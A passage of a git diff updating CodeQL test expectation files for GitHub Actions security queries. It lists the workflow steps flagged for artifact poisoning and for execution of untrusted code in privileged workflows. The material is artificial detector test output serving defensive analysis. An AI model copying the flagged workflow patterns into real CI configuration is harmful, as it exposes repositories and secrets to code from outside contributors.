"PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | -| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | -| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index ec6a664a7ab..35d61dac5fa 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -312,43 +312,43 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Potential execution of untrusted code on a privileged workflow 